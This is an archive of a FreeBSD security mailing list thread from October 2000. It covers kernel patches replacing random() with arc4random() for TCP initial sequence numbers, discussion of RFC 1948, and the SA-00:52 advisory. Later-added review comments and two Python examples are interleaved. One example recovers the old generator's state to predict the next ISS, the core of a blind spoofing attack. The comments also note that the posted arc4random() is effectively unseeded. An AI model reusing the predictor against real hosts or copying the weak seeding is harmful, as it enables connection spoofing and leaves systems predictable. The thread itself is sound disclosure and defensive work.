arc4_sbox[arc4_i]) % 256; + + arc4_swap(&arc4_sbox[arc4_i], &arc4_sbox[arc4_j]); + + arc4_t = (arc4_sbox[arc4_i] + arc4_sbox[arc4_j]) % 256; + return arc4_sbox[arc4_t]; +} + +u_int32_t +arc4random(void) +{ + u_int32_t ret; + + /* Initialize array if needed. 
*/ + if (!arc4_initialized) + arc4_init(); + if (++arc4_numruns > ARC4_MAXRUNS) + { + arc4_randomstir(); + arc4_numruns = 0; + } + + ret = arc4_randbyte(); + ret |= arc4_randbyte() << 8; + ret |= arc4_randbyte() << 16; + ret |= arc4_randbyte() << 24; + + return ret; +} Index: netinet/tcp_seq.h =================================================================== RCS file: /home/ncvs/src/sys/netinet/tcp_seq.h,v retrieving revision 1.6.4.1 diff -u -u -r1.6.4.1 tcp_seq.h --- netinet/tcp_seq.h 1999/09/05 08:18:43 1.6.4.1 +++ netinet/tcp_seq.h 2000/10/06 15:57:39 @@ -91,7 +91,7 @@ * number in the range [0-0x3ffff] that is hard to predict. */ #ifndef tcp_random18 -#define tcp_random18() ((random() >> 14) & 0x3ffff) +#define tcp_random18() (arc4random() & 0x3ffff) #endif #define TCP_ISSINCR (122*1024 + tcp_random18()) Index: netinet/tcp_subr.c =================================================================== RCS file: /home/ncvs/src/sys/netinet/tcp_subr.c,v retrieving revision 1.31.2.5 diff -u -u -r1.31.2.5 tcp_subr.c --- netinet/tcp_subr.c 1999/09/05 08:18:43 1.31.2.5 +++ netinet/tcp_subr.c 2000/10/06 15:58:29 @@ -104,7 +104,7 @@ tcp_init() { - tcp_iss = random(); /* wrong, but better than a constant */ + tcp_iss = arc4random(); /* wrong, but better than a constant */ tcp_ccgen = 1; tcp_cleartaocache(); LIST_INIT(&tcb); Index: sys/libkern.h =================================================================== RCS file: /home/ncvs/src/sys/sys/libkern.h,v retrieving revision 1.14.2.1 diff -u -u -r1.14.2.1 libkern.h --- sys/libkern.h 1999/09/05 08:22:31 1.14.2.1 +++ sys/libkern.h 2000/10/06 16:19:38 
@@ -61,6 +61,7 @@ static __inline u_long ulmin(u_long a, u_long b) { return (a < b ? a : b); } /* Prototypes for non-quad routines. */ +u_int32_t arc4random __P((void)); int bcmp __P((const void *, const void *, size_t)); #ifndef HAVE_INLINE_FFS int ffs __P((int)); thanks, -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 13:51: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id A485D37B66C for ; Fri, 6 Oct 2000 13:51:01 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13heSK-00008z-00; Fri, 06 Oct 2000 22:51:00 +0200 Date: Fri, 6 Oct 2000 22:51:00 +0200 (IST) 
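Review bot: in the files.i386 hunk the new entry goes after libkern/umoddi3.c, but the neighbouring libkern lines (strncpy.c, udivdi3.c, umoddi3.c) are kept in alphabetical order; move libkern/arc4random.c up so the list stays sorted and the entry is not overlooked the next time someone scans it.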
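Review bot: in arc4_randomstir() the key is never filled: read_random() is commented out and r is forced to 0 (the "XXX MarkM - revisit this when /dev/random is done" line carried over from the 4.x file, which the $FreeBSD$ id shows is rev 1.6), so the S-box is keyed from whatever happens to be in the uninitialised key[256] array on the stack. On 2.2.x there is no /dev/random to plug back in, so as posted arc4random() is an RC4 stream with a key an attacker can often reproduce, and the new tcp_random18() inherits that. At a minimum mix something an attacker cannot observe into key[] before the stir loop (a per-boot value and microtime(), for example) and say in the comment that the generator is not cryptographically seeded. Two smaller points in the same file: arc4_randomstir() never resets arc4_j to 0 before the key schedule, unlike a standard RC4 key setup, and re-stirring every ARC4_MAXRUNS outputs with the same unkeyed input adds nothing.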
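Review bot: the tcp_seq.h hunk changes where the 18 random bits come from but leaves TCP_ISSINCR as 122*1024 plus that term, so the ISS is still a global counter advanced by a randomised increment; that matches the 4.x fix, and the "hard to predict" comment above the macro holds only as far as arc4random() is actually seeded. Worth saying in the covering note that this is not the per-connection-ID scheme of RFC 1948.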
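Review bot: tcp_iss = arc4random() in tcp_init() is the first arc4random() call at boot, so it is what triggers arc4_init() and the first stir; if real seeding is added later, remember that the initial S-box will be keyed from whatever is available that early. The "wrong, but better than a constant" comment still applies and should stay.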
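Review bot: the libkern.h hunk adds the prototype callers will see, but the two #include lines at the top of the posted arc4random.c have lost their header names in this copy; confirm the file includes <sys/types.h> (for u_int8_t and u_int32_t) and <sys/libkern.h> (so the definition is checked against this prototype) before this goes in.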
From: Roman Shterenzon To: Alfred Perlstein Cc: security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) In-Reply-To: <20001006112315.A266@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It's great to see 2.2.8 patched ! Any idea about the solaris implementation of rfc1948 ? Can this be done in FreeBSD? --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 13:52: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 0EC7437B502 for ; Fri, 6 Oct 2000 13:52:05 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e96KpvH05236; Fri, 6 Oct 2000 13:51:57 -0700 (PDT) Date: Fri, 6 Oct 2000 13:51:57 -0700 
From: Alfred Perlstein To: Roman Shterenzon Cc: security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Message-ID: <20001006135157.G266@fw.wintelcom.net> References: <20001006112315.A266@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from roman@xpert.com on Fri, Oct 06, 2000 at 10:51:00PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Roman Shterenzon [001006 13:50] wrote: > It's great to see 2.2.8 patched ! > Any idea about the solaris implementation of rfc1948 ? > Can this be done in FreeBSD? I don't have time to look that up, what is it? SACK? If it is afaik someone is already working on it. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 14: 9:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id BB3C437B66C for ; Fri, 6 Oct 2000 14:09:25 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hekE-0000Ap-00; Fri, 06 Oct 2000 23:09:30 +0200 Date: Fri, 6 Oct 2000 23:09:30 +0200 (IST) 
From: Roman Shterenzon To: Alfred Perlstein Cc: security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) In-Reply-To: <20001006135157.G266@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, 6 Oct 2000, Alfred Perlstein wrote:
> * Roman Shterenzon [001006 13:50] wrote:
> > It's great to see 2.2.8 patched !
> > Any idea about the solaris implementation of rfc1948 ?
> > Can this be done in FreeBSD?
>
> I don't have time to look that up, what is it? SACK?
>
> If it is afaik someone is already working on it.

RFC1948 - Defending Against Sequence Number Attacks

Solaris has a sysctl-like interface (ndd) for these:

# TCP_STRONG_ISS sets the TCP initial sequence number generation parameters.
# Set TCP_STRONG_ISS to be:
# 0 = Old-fashioned sequential initial sequence number generation.
# 1 = Improved sequential generation, with random variance in increment.
# 2 = RFC 1948 sequence number generation, unique-per-connection-ID.

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

From owner-freebsd-security Fri Oct 6 14:16:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 153C437B502 for ; Fri, 6 Oct 2000 14:16:14 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e96LG8a06070; Fri, 6 Oct 2000 14:16:08 -0700 (PDT) Date: Fri, 6 Oct 2000 14:16:08 -0700
From: Alfred Perlstein To: Roman Shterenzon Cc: security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Message-ID: <20001006141608.H266@fw.wintelcom.net> References: <20001006135157.G266@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from roman@xpert.com on Fri, Oct 06, 2000 at 11:09:30PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

* Roman Shterenzon [001006 14:09] wrote:
> On Fri, 6 Oct 2000, Alfred Perlstein wrote:
>
> > * Roman Shterenzon [001006 13:50] wrote:
> > > It's great to see 2.2.8 patched !
> > > Any idea about the solaris implementation of rfc1948 ?
> > > Can this be done in FreeBSD?
> >
> > I don't have time to look that up, what is it? SACK?
> >
> > If it is afaik someone is already working on it.
> RFC1948 - Defending Against Sequence Number Attacks
>
> Solaris has a sysctl-like interface (ndd) for these:
>
> # TCP_STRONG_ISS sets the TCP initial sequence number generation parameters.
> # Set TCP_STRONG_ISS to be:
> # 0 = Old-fashioned sequential initial sequence number generation.
> # 1 = Improved sequential generation, with random variance in increment.
> # 2 = RFC 1948 sequence number generation, unique-per-connection-ID.

I'm sure it's possible to do this with FreeBSD; from what it looks like we implement option 1, and with patches I'm sure we could do '2' as well.

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."

From owner-freebsd-security Fri Oct 6 14:46:23 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id D836D37B502; Fri, 6 Oct 2000 14:45:41 -0700 (PDT)
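The RFC 1948 scheme behind Solaris's TCP_STRONG_ISS = 2, as discussed in the two messages above, written out as an added example; this is my illustration, not code from the thread, from Solaris or from FreeBSD. RFC 1948 defines ISS = M + F(localhost, localport, remotehost, remoteport, secret), with M the 4 microsecond clock of RFC 793 and F a keyed hash of the connection identifier; MD5 is the hash the RFC suggests. The secret, the addresses, the ports and the timestamps below are constructed for the demonstration. The observer function shows why the secret matters: an attacker who has received ISS values on its own connections can recover the clock and compute the ISS a trusted host will be offered only if it also knows the secret.

```python
"""RFC 1948 initial sequence numbers: ISS = M + F(localhost, localport, remotehost, remoteport, secret).

Constructed example, not Solaris or FreeBSD code.  M is the 4-microsecond
clock of RFC 793, F is a keyed hash over the connection identifier.  RFC 1948
suggests MD5 and a secret picked at boot; both are used here, the secret being
a constant invented for the demonstration.
"""
import hashlib
import ipaddress
import struct


def connection_hash(local_ip, local_port, remote_ip, remote_port, secret):
    """F(): the leading 32 bits of MD5 over the 4-tuple and the secret."""
    ident = (ipaddress.ip_address(local_ip).packed + struct.pack("!H", local_port)
             + ipaddress.ip_address(remote_ip).packed + struct.pack("!H", remote_port))
    return struct.unpack("!I", hashlib.md5(ident + secret).digest()[:4])[0]


def rfc1948_iss(local_ip, local_port, remote_ip, remote_port, secret, now_us):
    """ISS for one connection; now_us is microseconds since boot, M ticks every 4 us."""
    m = (now_us // 4) & 0xffffffff
    f = connection_hash(local_ip, local_port, remote_ip, remote_port, secret)
    return (m + f) & 0xffffffff


def predicted_iss(seen_iss, seen_tuple, target_tuple, secret_guess, elapsed_us):
    """What an observer can compute for another connection from an ISS it received itself.

    seen_tuple is the observer's own (local_ip, local_port, remote_ip, remote_port),
    target_tuple the 4-tuple it wants to spoof elapsed_us later.  It strips its
    own F to recover M, advances the clock, and adds the target's F.  The result
    is exact only if secret_guess is the real secret; without it the two F values
    are unrelated, which is the point of the scheme.
    """
    m_seen = (seen_iss - connection_hash(*seen_tuple, secret_guess)) & 0xffffffff
    m_target = (m_seen + elapsed_us // 4) & 0xffffffff
    return (m_target + connection_hash(*target_tuple, secret_guess)) & 0xffffffff


if __name__ == "__main__":
    SECRET = b"constructed per-boot secret"            # invented for the demo
    me = ("10.0.0.1", 513, "203.0.113.7", 40000)       # server <- observer's own host
    trusted = ("10.0.0.1", 513, "10.0.0.2", 1023)      # server <- host listed in hosts.equiv
    seen = rfc1948_iss(*me, SECRET, 1_000_000)
    real = rfc1948_iss(*trusted, SECRET, 1_000_400)
    print(predicted_iss(seen, me, trusted, SECRET, 400) == real)   # True: with the secret
    print(predicted_iss(seen, me, trusted, b"", 400) == real)      # False: without it
```

For the same 4-tuple the ISS still advances with the clock, which is what keeps a reused port out of the previous incarnation's sequence space; only the cross-tuple offset is hidden, and it stays hidden only while the secret does.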
From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-00:52.tcp-iss Reply-To: security-advisories@freebsd.org Message-Id: <20001006214541.D836D37B502@hub.freebsd.org> Date: Fri, 6 Oct 2000 14:45:41 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:52                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          TCP uses weak initial sequence numbers

Category:       core
Module:         kernel
Announced:      2000-10-06
Credits:        Hacker Emergency Response Team
Affects:        FreeBSD 3.x, 4.x and 5.x prior to the correction date
Corrected:      2000-09-28 (5.0-CURRENT, 4.1.1-STABLE, 3.5.1-STABLE)
FreeBSD only:   NO

I.   Background

TCP network connections use an initial sequence number as part of the connection handshaking. According to the TCP protocol, an acknowledgement packet from a remote host with the correct sequence number is trusted to come from the remote system with which an incoming connection is being established, and the connection is established.

II.  Problem Description

It has long been known that an attacker who can guess the initial sequence number which a system will use for the next incoming TCP connection can spoof a TCP connection handshake coming from a machine to which he does not have access, and then send arbitrary data into the resulting TCP connection which will be accepted by the server as coming from the spoofed machine.

Systems derived from 4.4BSD-Lite2 including FreeBSD include code which attempts to introduce an element of unpredictability into the initial sequence numbers to prevent sequence number guessing by a remote attacker.
However, the pseudo-random number generator used is a simple linear congruential generator, and based on observations of a few initial sequence values from legitimate connections with a server, an attacker can guess with high probability the value which will be used for the next connection.

In order for this to be successfully exploited, the attacker must also satisfy the following conditions:

a) be able to initiate several consecutive TCP connections to an open port on the server in a short space of time (immediately followed by the attack itself). Quiescent servers (those which are not receiving connections from other systems at the time of attack) are therefore most vulnerable to the attack.

b) be able to prevent the spoofed client machine from responding to the packets sent to it from the server, by making use of an address which is offline or by executing a denial of service attack against it to prevent it from responding.

c) make use of an application-level protocol on the server which authenticates or grants trust solely based on the IP address of the client, not any higher-level authentication mechanisms such as a password or cryptographic key.

d) be able to guess or infer the return TCP data from the server to the spoofed client (if any), to which he will not have access.

All versions of FreeBSD prior to the correction date including 4.1.1 and 3.5.1 are vulnerable to this problem.

The FreeBSD Security Officer would like to thank the Hacker Emergency Response Team for working with us to bring this matter to our attention, and to coordinate the release of this advisory.

III. Impact

Systems running insecure protocols which blindly trust a TCP connection which appears to come from a given IP address without requiring other authentication of the originator are vulnerable to spoofing by a remote attacker, potentially yielding privileges or access on the local system.
Examples of such protocols and services are: the rlogin/rsh/rexec family when used to grant passwordless access (e.g. via .rhosts or hosts.equiv files); web server address-based access controls on scripts which do not require user authentication and which control privileged resources; tcp-wrappers host access controls around services which do not authenticate the connection further; lpr address-based access controls, and others.

Note that the rlogin family of protocols when configured to use Kerberos or UNIX passwords is not vulnerable to this attack since they authenticate connections (using Kerberos tickets in the former case, and account passwords in the latter). Source address based authentication in the rlogin family of protocols is not used by default, and must be specifically enabled through use of a per-user .rhosts file, or a global /etc/hosts.equiv file.

Attackers can also forge TCP connections to arbitrary TCP protocols (including protocols not vulnerable to the spoofing attack described above) and simulate the effects of failed remote access attempts from a target machine (e.g. repeated attempts to guess a password), potentially misleading the administrators of the server into thinking they are under attack from the spoofed client.

IV.  Workaround

Note that in order to exploit the vulnerability an attacker must make several real connection attempts in close succession to a port on the target machine (e.g. a web server). Since in order for the attack to be successful the machine must be quiescent (i.e. not accepting any other connections), this rapid connection activity followed by a connection to an insecure service may provide a signature which can be used to detect and trace the attacker.
Possible workarounds for the vulnerability include one or more of the following:

1) Disable all insecure protocols and services including rlogin, rsh and rexec (if configured to use address-based authentication), or reconfigure them to not authenticate connections based solely on originating address. In general, the rlogin family should not be used anyway - the ssh family of commands (ssh, scp, slogin) provide a secure alternative which is included in FreeBSD 4.0 and above.

To disable the rlogin family of protocols, make sure the /etc/inetd.conf file does not contain any of the following entries uncommented (i.e. if present in the inetd.conf file they should be commented out as shown below):

#shell  stream  tcp     nowait  root    /usr/libexec/rshd       rshd
#login  stream  tcp     nowait  root    /usr/libexec/rlogind    rlogind
#exec   stream  tcp     nowait  root    /usr/libexec/rexecd     rexecd

Be sure to restart inetd by sending it a HUP signal after making any changes:

# kill -HUP `cat /var/run/inetd.pid`

Audit the use of other services including those noted in section III above and either disable the service, or if possible require it to use a stronger form of authentication. See workaround 3) below.

2) Impose IP-level packet filters on network perimeters or on local affected machines to prevent access from any outside party to a vulnerable internal service using a "privileged" source address. For example, if machines on the internal 10.0.0.0/24 network are allowed to obtain passwordless rlogin access to a server, then external users should be prevented from sending packets with 10.0.0.0/24 source addresses from the outside network into the internal network. This is standard good security policy.

Note however that if an external address must be granted access to local resources then this type of filtering cannot be applied. It also does not defend against spoofing attacks from within the network perimeter. Consider disabling this service until the affected machines can be patched.
3) Enable the use of IPSEC to authenticate (and/or encrypt) vulnerable TCP connections at the IP layer. A system which requires authentication of all incoming connections to a port using IPSEC cannot be spoofed using the attack described in this advisory, nor can TCP sessions be hijacked by an attacker with access to the packet stream. FreeBSD 4.0 and later include IPSEC functionality in the kernel, and 4.1 and later include an IKE daemon, racoon, in the ports collection. Configuration of IPSEC is beyond the scope of this document, however see the following web resources:

http://www.freebsd.org/handbook/ipsec.html
http://www.netbsd.org/Documentation/network/ipsec/
http://www.kame.net/

V.   Solution

Note that address-based authentication is generally weak, and should be avoided even in environments running with the sequence numbering improvements. Instead, cryptographically-protected protocols and services should be used wherever possible.

One of the following:

1) Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE or 3.5.1-STABLE after the respective correction dates.

2a) FreeBSD 3.x systems

Download the patch and detached PGP signature from the following locations, and verify the signature using your PGP utility.

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:52/tcp-iss-3.x.patch
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:52/tcp-iss-3.x.patch.asc

# cd /usr/src/sys/
# patch -p < /path/to/patch

[ Recompile your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html and reboot the system ]

2b) FreeBSD 4.x systems

Apply the patch below and recompile your kernel. Either save this advisory to a file, or download the patch and detached PGP signature from the following locations, and verify the signature using your PGP utility.
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:52/tcp-iss.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:52/tcp-iss.patch.asc # cd /usr/src/sys/netinet # patch -p < /path/to/patch_or_advisory [ Recompile your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html and reboot the system ] Patch for vulnerable 4.x systems: Index: tcp_seq.h =================================================================== RCS file: /usr2/ncvs/src/sys/netinet/tcp_seq.h,v retrieving revision 1.11 retrieving revision 1.12 diff -u -r1.11 -r1.12 --- tcp_seq.h 1999/12/29 04:41:02 1.11 +++ tcp_seq.h 2000/09/29 01:37:19 1.12 @@ -91,7 +91,7 @@ * number in the range [0-0x3ffff] that is hard to predict. */ #ifndef tcp_random18 -#define tcp_random18() ((random() >> 14) & 0x3ffff) +#define tcp_random18() (arc4random() & 0x3ffff) #endif #define TCP_ISSINCR (122*1024 + tcp_random18()) Index: tcp_subr.c =================================================================== RCS file: /usr2/ncvs/src/sys/netinet/tcp_subr.c,v retrieving revision 1.80 retrieving revision 1.81 diff -u -r1.80 -r1.81 --- tcp_subr.c 2000/09/25 23:40:22 1.80 +++ tcp_subr.c 2000/09/29 01:37:19 1.81 
@@ -178,7 +178,7 @@ { int hashsize; - tcp_iss = random(); /* wrong, but better than a constant */ + tcp_iss = arc4random(); /* wrong, but better than a constant */ tcp_ccgen = 1; tcp_cleartaocache(); -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOd5Gv1UuHi5z0oilAQEzJwQAkJbKJBJcaIYFbMuRnINbNQQS/mLUuRoh fIzPEC17B2fwx+NjuHppBXroOsmsw0enM4tk7afP2yc3z2Ecyapr+oQH9KzBQ+nQ 56IGoi5/MLgEY2KQn3kQBV++pH9zo/F/Gz3XV/x2gDUgLy0F9p2eYjDGkrA1U1H2 NTx5kXB6ZE4= =zdbr -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 15: 5:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 1A4C137B66D for ; Fri, 6 Oct 2000 15:05:32 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id PAA00538; Fri, 6 Oct 2000 15:06:07 -0700 (PDT) Date: Fri, 6 Oct 2000 15:06:07 -0700 
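Review bot: the tcp_seq.h hunk is the same one-line substitution as in the 2.2.x backport posted earlier in the thread, and its strength rests entirely on how arc4random() is keyed in the tree being patched. The copy of libkern/arc4random.c posted with that backport carries the $FreeBSD$ id for rev 1.6 and has read_random() commented out with r forced to 0, so anyone applying this patch to a 4.x source tree should check that their libkern/arc4random.c is actually seeded from the entropy device; the advisory does not say which arc4random.c revision the fix assumes.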
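Review bot: the tcp_subr.c hunk keeps the comment "wrong, but better than a constant", and it is still accurate after the change: tcp_iss is seeded once here and then advanced by TCP_ISSINCR with an 18-bit random term per connection, which is the Solaris "mode 1" scheme discussed in the thread rather than a per-connection value. Section V already says address-based trust stays weak; the advisory could point at RFC 1948 as the direction for a stronger fix.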
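Section II of the advisory says that an attacker who observes a few initial sequence numbers from legitimate connections can guess the next one. The following simulation is an added example of mine, not code from the advisory, the thread or FreeBSD. It assumes, from my reading of the 4.x sources rather than from anything stated on the page, that the old kernel random() is the Park-Miller generator x' = 16807 * x mod (2^31 - 1) and that each new connection is handed the global tcp_iss, which is then advanced by TCP_ISSINCR/2; the tcp_random18() and TCP_ISSINCR definitions are the "before" side of the tcp_seq.h hunk above. The 500 ms timer bump of tcp_iss (another draw from the same generator) is left out, since condition II.a, several connections in a short space of time, is what keeps an attacker inside one timer tick. Every sequence number below is produced by the simulation itself; nothing here sends packets.

```python
"""Simulation of the pre-SA-00:52 ISS generator and of an observer recovering its state.

Assumed model (from a reading of the 4.x sources, not stated on the page):
  random()        Park-Miller: x' = 16807 * x mod (2^31 - 1)
  tcp_random18()  (random() >> 14) & 0x3ffff          (old tcp_seq.h, see the hunk above)
  TCP_ISSINCR     122*1024 + tcp_random18()           (tcp_seq.h, see the hunk above)
  new connection  iss = tcp_iss; tcp_iss += TCP_ISSINCR/2
The 500 ms slow-timer bump of tcp_iss is deliberately left out.
"""

M31 = 0x7fffffff          # 2^31 - 1, the LCG modulus
HALF_INCR = 61 * 1024     # (122*1024)/2, the fixed part of every per-connection step


def park_miller(x):
    """One draw of the old kernel random(): x' = 7^5 * x mod (2^31 - 1)."""
    return (16807 * x) % M31


class OldIssGenerator:
    """Server side: the global tcp_iss and the LCG behind TCP_ISSINCR."""

    def __init__(self, seed):
        self.state = seed % M31 or 1
        self.tcp_iss = self._random()        # tcp_init(): tcp_iss = random()

    def _random(self):
        self.state = park_miller(self.state)
        return self.state

    def new_connection(self):
        """ISS handed to the next connection; then tcp_iss += TCP_ISSINCR/2."""
        iss = self.tcp_iss
        random18 = (self._random() >> 14) & 0x3ffff
        self.tcp_iss = (iss + (122 * 1024 + random18) // 2) & 0xffffffff
        return iss


# Observer side.  Each delta between consecutive ISS values equals
# HALF_INCR + (random_i >> 15): it leaks bits 15..30 of one 31-bit LCG
# output and leaves only 2^15 possibilities for the rest.

def iss_deltas(observed):
    """Differences between consecutive ISS values seen on the observer's own connections."""
    return [(b - a) & 0xffffffff for a, b in zip(observed, observed[1:])]


def recover_lcg_states(observed):
    """Candidate LCG states after the last observed draw; a single candidate means success.

    Enumerates the 2^15 unknown low bits of the first leaked draw and keeps
    every candidate whose successors reproduce all the later deltas.
    """
    leaked = [d - HALF_INCR for d in iss_deltas(observed)]
    if len(leaked) < 2 or any(not 0 <= h < (1 << 16) for h in leaked):
        return []          # too few observations, or not this generator
    survivors = []
    for low in range(1 << 15):
        y = (leaked[0] << 15) | low
        for h in leaked[1:]:
            y = park_miller(y)
            if (y >> 15) != h:
                break
        else:
            survivors.append(y)
    return survivors


def predict_next_iss(observed):
    """Sorted list of ISS values the next connection can receive (ideally exactly one)."""
    last = observed[-1]
    guesses = {(last + HALF_INCR + (park_miller(s) >> 15)) & 0xffffffff
               for s in recover_lcg_states(observed)}
    return sorted(guesses)


def demo(seed=20001006, samples=4):
    """Open `samples` connections, predict the next ISS, then check it; returns (hit, candidates)."""
    server = OldIssGenerator(seed)
    seen = [server.new_connection() for _ in range(samples)]
    guesses = predict_next_iss(seen)
    return server.new_connection() in guesses, len(guesses)


if __name__ == "__main__":
    print(demo())
```

Four observed connections (three deltas) are enough: a wrong candidate for the first draw differs from the true one by at most 2^15, so only the neighbours at distance 1 can survive the first check, and 16807^2 mod (2^31 - 1) is far too large for them to survive the second. The 32768-step search runs in well under a second, which is the whole of the advisory's point about a linear congruential generator.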
From: Kris Kennaway
To: Fernando Schapachnik
Cc: security@FreeBSD.ORG
Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd)
Message-ID: <20001006150607.A471@citusc17.usc.edu>
In-Reply-To: <200010061212.JAA83234@ns1.via-net-works.net.ar>

On Fri, Oct 06, 2000 at 09:12:54AM -0300, Fernando Schapachnik wrote:
> Many of you may have read this.
>
> It states that 4.1 is vulnerable, but doesn't mention 4.1.1. It also
> provides URLs to patches that are not accessible. Somebody has more
> info?

This was a fault on my part. I had planned to release advisory 00:52
yesterday and told HERT to go ahead and send theirs out on that day, but
then I became enveloped in a little personal maelstrom of issues yesterday
and didn't have time to release ours. It's just gone out now.

Kris

P.S. No-one apparently noticed that the previous advisory we released was
numbered 00:53, skipping a number - this was because I had a draft
advisory in my local system with duplicate numbers :-)

From owner-freebsd-security Fri Oct 6 16:02:17 2000
Date: Fri, 6 Oct 2000 18:01:48 -0500
From: "Matthew D. Fuller"
To: Jordan Hubbard
Cc: Robert Watson, John Baldwin, freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG
Subject: Re: Stable branch
Message-ID: <20001006180148.B29088@futuresouth.com>
In-Reply-To: <3175.970802405@winston.osd.bsdi.com>

[trim on the CC's a bit]

On Thu, Oct 05, 2000 at 08:20:05PM -0700, a little birdie told me
that Jordan Hubbard remarked
> > I'm not sure I see the n-way merge.
> > ..
> > When a fix is required, you merge it into -STABLE, and then if
> > appropriate, into the release branch also.
>
> Which is the n-way aspect. You've just increased the amount of
> merging by n, where n is each active "release branch" you choose to
> support rather than being able to merge once to the branch head and
> point people at that. Sure, you can say it's only for the most minor
> patches and such and merge work will be minimal, but in order to
> support a user assumption that they can install release x and then
> stay on the release x branch from there on out, someone still has
> to remember to merge to several locations rather than one now. Ick.

As someone who doesn't have to deal directly with it, I feel perfectly
free to make the following comments from the sidelines ;)

A) The way we're doing it now works for us.
B) Obviously a lot of people want some change to provide a differentiation
   between plain-old -STABLE and production machines, because of a real or
   perceived idea that -STABLE isn't also so.
C) A lot of people want to stick with a -RELEASE, but still have access to
   security fixes (above all, though many will want serious bugfixes as well)

Any idea to expand into this realm is going to be painful.
The idea of creating 'branches' for each release sounds like the least
painful of the group to me, however.

Summary:
- Each -RELEASE is a branch, onto which security (not bug, unless it's a
  *BIIIIIIIIIIIIIIIG* bug, like printf() not working) fixes go as they
  become necessary.
- Users who want to stick with a set system, but get security fixes and
  keep up to date on such, track the -RELEASE branch for their release,
  each update along which updates a 'patchlevel' or something in their
  version so they (and we when they bitch) know what they have fixes for.
- Users who want the more 'normal' and 'minor' bugfixes track -STABLE,
  just like they do now.
- Those of us who like to have fun track -CURRENT, like we do now.

I think it might actually be easier to suck up and branch each release,
and stick security fixes on the branch, than to shoot this idea down
every few months for the rest of our lives ;)

--
Matthew Fuller (MF4839)     | fullermd@over-yonder.net
Unix Systems Administrator  | fullermd@futuresouth.com
Specializing in FreeBSD     | http://www.over-yonder.net/
"The only reason I'm burning my candle at both ends, is because I haven't
figured out how to light the middle yet"

From owner-freebsd-security Fri Oct 6 16:19:48 2000
Date: Fri, 6 Oct 2000 16:19:44 -0700
From: Alfred Perlstein
To: security@freebsd.org
